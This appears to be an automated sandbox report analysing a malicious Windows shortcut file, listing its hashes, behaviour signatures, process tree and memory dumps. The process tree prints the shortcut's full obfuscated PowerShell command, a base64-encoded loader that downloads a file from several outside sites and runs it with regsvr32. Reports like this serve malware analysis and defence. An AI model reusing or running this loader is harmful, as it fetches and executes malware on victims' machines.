Analysis

  • max time kernel
    14s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 16:18

General

  • Target

    6e92a1fbafbc5bee0a4a5babd4041cbfdd9241c1cf7bd7da8f6ff4a688a811f3.lnk

  • Size

    3KB

  • MD5

    cf21b34c7584ffa2b1e8f045b3bf8b6d

  • SHA1

    3b7043526a004d28b034621e3754a60d519e871d

  • SHA256

    6e92a1fbafbc5bee0a4a5babd4041cbfdd9241c1cf7bd7da8f6ff4a688a811f3

  • SHA512

    83cc7b098965ac35a70a764c68f95f290d9ec8d1ed8ff2f3dcbcaf61c17d36e662f98b6ef571fe8751721cc086ab1606bbb974c0aa437b963d17b164c8e91df3

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\6e92a1fbafbc5bee0a4a5babd4041cbfdd9241c1cf7bd7da8f6ff4a688a811f3.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'xPej0Shc5xxIazh+qhMy4gypNEdzuvDoFuUQ1wVUyoiBRvl8Y/9PTxSfLdbv2o/CIeArC03Y';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3004

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3004-38-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

    Filesize

    4KB

  • memory/3004-39-0x000000001B350000-0x000000001B632000-memory.dmp

    Filesize

    2.9MB

  • memory/3004-40-0x0000000002410000-0x0000000002418000-memory.dmp

    Filesize

    32KB

  • memory/3004-41-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

  • memory/3004-42-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

  • memory/3004-43-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

  • memory/3004-44-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB